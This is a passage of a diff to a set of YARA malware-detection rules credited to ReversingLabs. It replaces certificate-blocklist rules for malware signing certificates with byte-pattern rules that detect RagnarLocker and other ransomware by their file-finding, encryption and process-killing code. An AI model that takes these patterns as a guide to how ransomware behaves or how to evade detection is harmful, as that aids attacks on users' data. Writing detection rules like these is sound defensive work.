+            ?? ?? FF D2 48 8B 0D ?? ?? ?? ?? 83 B9 ?? ?? ?? ?? ?? 75 ?? 48 89 C2 48 C1 E0 ?? 48
+            8D 70 ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 D1 48 F7 EE 48 8D 14 CA 48 8D 52 ?? 48
+        }
+		$encrypt_files_p3 = {
+            C1 FA ?? 48 C1 FE ?? 48 29 F2 EB ?? 48 8D 70 ?? 48 89 C1 48 B8 ?? ?? ?? ?? ?? ?? ??
+            ?? 48 F7 EE 48 8D 14 0A 48 8D 52 ?? 48 D1 FA 48 C1 FE ?? 48 29 F2 48 C1 E2 ?? 48 8D
+            4A ?? 48 89 4C 24 ?? 48 8D 05 ?? ?? ?? ?? 48 89 CB E8 ?? ?? ?? ?? 48 89 C3 48 8B 4C
+            24 ?? 48 89 CF 48 8B 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 89
+            8C 24 ?? ?? ?? ?? 48 85 DB 0F 85 ?? ?? ?? ?? 31 C0 48 8B 9C 24 ?? ?? ?? ?? 48 8B 4C
+            24 ?? 48 8D 3D ?? ?? ?? ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 D9 48 89 C3 48 8B 84
+            24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 85
+            DB 0F 85 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? BB ?? ?? ?? ?? 48 89 D9 31 FF 48 8B 74
+            24 ?? 4C 8B 84 24 ?? ?? ?? ?? 4C 8D 0D ?? ?? ?? ?? 4C 8B 94 24 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 66 0F 1F 44 00 ?? 48 85 DB 0F
+            85 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 89 C3 48 8D 0D ?? ?? ?? ?? 48 8B BC 24 ??
+            ?? ?? ?? 31 F6 45 31 C0 4D 89 C1 48 8D 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 9C 24 ??
+            ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 84 24
+            ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 85 C0 0F 85 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ??
+            ?? 31 DB 31 C9 E8 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 85
+            DB 74 ?? 90 E8 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 8B AC
+            24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 48 8B 94 24 ?? ?? ?? ?? 48 8B 72 ?? 48 8B 42
+            ?? 48 8B 56 ?? 31 DB 31 C9 48 89 CF FF D2 48 8B 15 ?? ?? ?? ?? 48 89 CF 48 89 D9 48
+        }
+		$encrypt_files_p4 = {
+            89 C3 48 89 D0 E8 ?? ?? ?? ?? 48 89 D9 48 89 C3 48 8B 84 24 ?? ?? ?? ?? 0F 1F 40 ??
+            E8 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 90 E8 ?? ?? ?? ?? 48
+            8B 84 24 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ??
+            ?? ?? C3 90 0F 1F 40 ?? E8 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ??
+            ?? 48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 90 E8 ?? ?? ?? ?? 48 8B 84 24 ??
+            ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 90
+            E8 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 8B AC 24 ?? ?? ??
+            ?? 48 81 C4 ?? ?? ?? ?? C3 90 E8 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 9C 24 ??
+            ?? ?? ?? 48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 90 E8 ?? ?? ?? ?? 48 8B 84
+            24 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ??
+            C3 90 66 90 E8 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 8B AC
+            24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 90 E8 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48
+            8B 9C 24 ?? ?? ?? ?? 48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 90 E8 ?? ?? ??
+            ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 8B AC 24 ?? ?? ?? ?? 48 81 C4
+            ?? ?? ?? ?? C3 90 E8 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48
+            8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 90 E8 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ??
+            ?? 48 8B 9C 24 ?? ?? ?? ?? 48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 90 66 90
+            E8 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 8B AC 24 ?? ?? ??
+            ?? 48 81 C4 ?? ?? ?? ?? C3 48 89 44 24 ?? 48 89 5C 24 ?? 48 89 4C 24 ?? 48 89 7C 24
+            ?? E8
+        }
+		$find_files_p1 = {
+            4C 8D A4 24 ?? ?? ?? ?? 4D 3B 66 ?? 0F 86 ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? 48 89 AC
+            24 ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ??
+            ?? 48 89 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 85 DB 7E ?? 48 89 5C 24 ?? 31 C9 EB ??
+            48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 48 8B 9C 24 ?? ?? ?? ?? 48 8D 43 ??
+            48 89 4C 24 ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 10 48 89 54 24 ?? 48 8B 58 ?? 48 89 5C
+            24 ?? 48 8B 72 ?? 48 89 D8 FF D6 48 89 84 24 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48
+            8B 8C 24 ?? ?? ?? ?? 48 8D 3D ?? ?? ?? ?? BE ?? ?? ?? ?? 49 89 C0 49 89 D9 31 C0 48
+            8B 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 44 24 ?? 48 89 5C 24 ?? 48 8B 4C 24 ?? 48
+            8B 51 ?? 48 8B 44 24 ?? FF D2 48 89 84 24 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 8D
+            4B ?? 66 90 E9 ?? ?? ?? ?? 48 29 CB 48 89 DA 48 F7 DB 48 C1 FB ?? 48 21 D9 48 01 C1
+            48 89 8C 24 ?? ?? ?? ?? 48 89 94 24 ?? ?? ?? ?? EB ?? 31 D2 31 C9 48 89 C8 48 89 D3
+            E8 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ??
+            48 8B 3D ?? ?? ?? ?? 48 8B 35 ?? ?? ?? ?? 66 90 E8 ?? ?? ?? ?? 84 C0 74 ?? 48 8D BC
+            24 ?? ?? ?? ?? 48 8D 35 ?? ?? ?? ?? 0F 1F 84 00 ?? ?? ?? ?? 48 89 6C 24 ?? 48 8D 6C
+        }
+		$find_files_p2 = {
+            24 ?? E8 ?? ?? ?? ?? 48 8B 6D ?? 48 8D 84 24 ?? ?? ?? ?? 31 C9 0F 1F 00 E9 ?? ?? ??
+            ?? 48 8B 4C 24 ?? 48 8B 49 ?? 48 8B 44 24 ?? FF D1 84 C0 74 ?? 48 8B 44 24 ?? 48 8B
+            5C 24 ?? 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 FF C1 48 8B 54 24
+            ?? 0F 1F 00 48 39 CA 0F 8F ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 FF C9 48 85 C9 0F 8C ?? ??
+            ?? ?? 0F B6 14 08 66 90 80 FA ?? 0F 84 ?? ?? ?? ?? 80 FA ?? 0F 84 ?? ?? ?? ?? 80 FA
+            ?? 75 ?? E9 ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 48 8D 42 ?? 48 89 4C 24 ?? 48 89 84
+            24 ?? ?? ?? ?? 48 8B 10 48 89 54 24 ?? 48 8B 70 ?? 48 89 74 24 ?? 48 8B 5C 24 ?? 48
+            8B 44 24 ?? E8 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 8B 44
+            24 ?? 48 8B 5C 24 ?? E8 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ??
+            48 89 DF 48 89 D3 48 89 C2 48 89 C8 48 89 D1 E8 ?? ?? ?? ?? 0F 1F 84 00 ?? ?? ?? ??
+            48 85 C0 0F 8D ?? ?? ?? ?? 48 8B 4C 24 ?? 48 FF C1 48 83 F9 ?? 0F 8C ?? ?? ?? ?? 48
+            8B 4C 24 ?? 48 89 8C 24 ?? ?? ?? ?? 48 8B 54 24 ?? 48 89 94 24 ?? ?? ?? ?? 48 8B 84
+            24 ?? ?? ?? ?? 48 8D 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 89 44 24 ??
+            48 89 5C 24 ?? 48 89 4C 24 ?? 66 90 E8
+        }
+		$kill_procs_p1 = {
+            4C 8D A4 24 ?? ?? ?? ?? 4D 3B 66 ?? 0F 86 ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? 48 89 AC
+            24 ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 90 E8 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48
+            89 5C 24 ?? 31 C9 66 90 EB ?? 48 8B 54 24 ?? 48 8D 4A ?? 48 8B 84 24 ?? ?? ?? ?? 48
+            8B 5C 24 ?? 0F 1F 84 00 ?? ?? ?? ?? 48 39 CB 0F 8E ?? ?? ?? ?? 48 89 4C 24 ?? 48 C1
+            E1 ?? 48 8B 1C 08 48 89 5C 24 ?? 48 8B 4C 08 ?? 48 89 4C 24 ?? 48 8B 73 ?? 48 89 C8
+            FF D6 48 89 1D ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 75 ?? 48 89 05 ?? ?? ?? ?? EB ?? 48
+            8D 3D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 8B 49 ?? 48 8B 44 24 ?? FF D1 48
+            89 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48 8B
+            3D ?? ?? ?? ?? 48 89 C3 48 8D 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48
+            89 08 48 8D BC 24 ?? ?? ?? ?? 48 8D 35 ?? ?? ?? ?? B9 ?? ?? ?? ?? F3 48 A5 48 8D BC
+            24 ?? ?? ?? ?? 48 8D 7F ?? 48 89 6C 24 ?? 48 8D 6C 24 ?? E8 ?? ?? ?? ?? 48 8B 6D ??
+            48 8D 05 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            EB ?? 48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 48 8D 84 24 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? 66 0F 1F 84 00 ?? ?? 00 00 48 85 C9 0F 84 ?? ?? ??
+            ?? 48 8B 94 24 ?? ?? ?? ?? 48 8B 12 48 89 54 24 ?? 48 8B 01 48 89 44 24 ?? 48 8B 59
+            ?? 48 89 5C 24 ?? 48 8D 8C 24 ?? ?? ?? ?? 31 F6 EB ?? 48 8B 94 24 ?? ?? ?? ?? 48 83
+        }
+		$kill_procs_p2 = {
+            C2 ?? 48 8B 44 24 ?? 48 8B 5C 24 ?? 48 89 CE 48 89 D1 48 89 74 24 ?? 48 89 8C 24 ??
+            ?? ?? ?? 48 8B 11 48 89 54 24 ?? 48 8B 79 ?? 48 89 7C 24 ?? E8 ?? ?? ?? ?? 48 8B 4C
+            24 ?? 48 8B 7C 24 ?? 90 E8 ?? ?? ?? ?? 48 85 C0 0F 8C ?? ?? ?? ?? 48 8B 44 24 ?? BB
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 89 C7 48 89 DE 31 C0 48 8D 1D ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 44 0F 11 39 48 8D 94 24 ?? ?? ?? ?? 44 0F
+            11 3A 48 8D 15 ?? ?? ?? ?? 48 89 94 24 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ??
+            ?? 48 89 84 24 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ?? BB ?? ?? ??
+            ?? BF ?? ?? ?? ?? 48 89 FE E8 ?? ?? ?? ?? 48 89 44 24 ?? 44 0F 11 BC 24 ?? ?? ?? ??
+            48 8D 0D ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 1D ?? ??
+            ?? ?? BF ?? ?? ?? ?? 48 89 FE 48 8D 05 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 48 8B 44 24 ?? 90 E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 FF C1 48 83 F9 ?? 0F 8C ??
+            ?? ?? ?? E9 ?? ?? ?? ?? 0F 1F 40 ?? E8
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OORT inc." and ( pe.signatures [ i ] . serial == "00:56:9e:03:98:8a:f6:0d:80:ce:60:72:89:40:85:0d:9b" or pe.signatures [ i ] . serial == "56:9e:03:98:8a:f6:0d:80:ce:60:72:89:40:85:0d:9b" ) and 1601006510 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $kill_procs_p* ) ) and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_418F6D959A8A0F82Bef07Ceba3603E52 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Ragnarlocker : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects RagnarLocker ransomware."
 		author = "ReversingLabs"
-		id = "ecfb72ef-04c4-55b6-b9e0-e95053e03425"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "3bc3765a-f1f8-59bc-bbe8-6821654b334f"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L5844-L5862"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "6c13c5e85d6e053319193d1d94f216eeec64405c86d15971419078a1ce6c8ac9"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.RagnarLocker.yara#L1-L108"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "398f0e5e003f87edf90cdea718be6b10470df317214d00db4dc6c4cccc5b6748"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "RagnarLocker"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OORT inc." and ( pe.signatures [ i ] . serial == "00:41:8f:6d:95:9a:8a:0f:82:be:f0:7c:eb:a3:60:3e:52" or pe.signatures [ i ] . serial == "41:8f:6d:95:9a:8a:0f:82:be:f0:7c:eb:a3:60:3e:52" ) and 1601928240 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_5378C5Bbeba0D3309A35Bb47F63037F7 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "7f367505-d7c1-5b8c-83bd-df3fec789d12"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L5864-L5882"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "a96acf93ca6da4d3bf5177b51996825cd3ea70443577622deccdd11fde579c31"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$find_files_p1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? 33 C0 B9 ?? ?? ?? ?? 53 8B 1D ?? ?? ?? ?? 56 8B 75 ?? 57
+            8D BD ?? ?? ?? ?? F3 AB 8B 3D ?? ?? ?? ?? 39 45 ?? 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 8D
+            85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? FF 75
+            ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ??
+            8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF D3
+        }
+		$find_files_p2 = {
+            68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D
+            85 ?? ?? ?? ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ??
+            ?? 83 FB ?? 75 ?? C7 45 ?? ?? ?? ?? ?? 33 F6 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? FF 74 B5 ?? 8D 85 ?? ?? ?? ?? 50 FF D7 85 C0 0F 84 ?? ?? ??
+            ?? 46 83 FE ?? 7C ?? 33 C0 85 C0 0F 85 ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50
+            68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
+            50 FF 75 ?? FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50
+            FF D6 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D
+            85 ?? ?? ?? ?? 50 FF D6 6A ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ??
+            8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF D6 6A ?? 8D 85 ?? ?? ?? ?? 53 50 E8 ??
+            ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ??
+            ?? ?? 8B 45 ?? 8B 1D ?? ?? ?? ?? 8B 75 ?? 50 FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50
+            56 FF D3
+        }
+		$find_files_p3 = {
+            33 F6 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
+            ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 90 FF 74 B5 ??
+            53 FF D7 85 C0 74 ?? 46 83 FE ?? 72 ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
+            8B 45 ?? 8B 75 ?? 8D 8D ?? ?? ?? ?? 51 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 45 ?? E9
+            ?? ?? ?? ?? 5F 5E 32 C0 5B 8B E5 5D C3 FF 75 ?? FF 15 ?? ?? ?? ?? 5F 5E B0 ?? 5B 8B
+            E5 5D C3
+        }
+		$encrypt_files_p1 = {
+            56 8B 75 ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
+            83 C4 ?? 68 ?? ?? ?? ?? 50 FF D7 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D7 56 8B 35 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? 8D 85
+            ?? ?? ?? ?? 50 FF D6 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 8D 85 ?? ??
+            ?? ?? 50 68 ?? ?? ?? ?? FF D6 FF 75 ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 85
+            ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 8B F0 FF 15 ?? ?? ?? ?? 50 FF 15 ?? ??
+            ?? ?? 8B F8 C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 68 ?? ?? ?? ?? 56 8D 85 ?? ?? ??
+            ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? FF 75 ?? 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15
+        }
+		$encrypt_files_p2 = {
+            8D 45 ?? 50 57 68 ?? ?? ?? ?? 56 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ??
+            57 50 FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ??
+            68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 74 ?? 8B 35 ?? ?? ??
+            ?? 8D 4D ?? 6A ?? 51 FF 75 ?? FF 75 ?? 50 FF D6 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 68
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83
+            C4 ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 8D 4D ?? 51 50 8D 85 ?? ?? ?? ??
+            50 FF 75 ?? FF D6 8B 45 ?? 50 FF 15 ?? ?? ?? ?? A1 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? FF D0 FF 75 ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? BF ?? ??
+            ?? ?? 89 45 ?? 8D 57 ?? 8B CF D3 E8 A8 ?? 0F 84 ?? ?? ?? ?? 8D 47 ?? C7 45 ?? ?? ??
+            ?? ?? 66 89 45 ?? 33 F6 33 C0 50 50 50 50 50 68 ?? ?? ?? ?? 50 66 89 45 ?? 8D 45 ??
+            50 FF 15 ?? ?? ?? ?? 89 45 ?? 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ??
+            ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ??
+            ?? 66 8B 85 ?? ?? ?? ?? 66 3B 45 ?? 75 ?? 66 8B 85 ?? ?? ?? ?? 66 3B 45 ?? B8 ?? ??
+            ?? ?? 0F 44 F0 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 C7 45 ?? ?? ?? ?? ?? 8D 85 ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 50 C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ??
+            ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ??
+            ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 56 50 E8 ?? ?? ?? ?? 83 C4 ?? BA ??
+            ?? ?? ?? 83 EF ?? 8B 45 ?? 0F 89 ?? ?? ?? ?? 0F 57 C0 C7 85
+        }
+		$encrypt_files_p3 = {
+            0F 29 85 ?? ?? ?? ?? 0F 29 85 ?? ?? ?? ?? 0F 29 85 ?? ?? ?? ?? 0F 29 85 ?? ?? ?? ??
+            0F 29 45 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 45 ?? 8D 45 ?? 50 68
+            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 6A ?? 6A ?? 68
+            ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 6A ?? FF 75 ?? FF 15 ?? ??
+            ?? ?? B8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 8D 85 ?? ??
+            ?? ?? 6A ?? 50 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85
+            ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50
+            FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 6A ?? 6A ??
+            6A ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85
+            C0 74 ?? FF 75 ?? 8B 35 ?? ?? ?? ?? FF D6 FF 75 ?? FF D6 6A ?? FF 15
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OORT inc." and ( pe.signatures [ i ] . serial == "00:53:78:c5:bb:eb:a0:d3:30:9a:35:bb:47:f6:30:37:f7" or pe.signatures [ i ] . serial == "53:78:c5:bb:eb:a0:d3:30:9a:35:bb:47:f6:30:37:f7" ) and 1601427420 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_0Bab6A2Aa84B495D9E554A4C42C0126D : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Sifreli : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Sifreli ransomware."
 		author = "ReversingLabs"
-		id = "7b6d364c-3e27-5314-b604-d44bb408fc4e"
-		date = "2023-11-08"
-		modified = "2023-11-08"
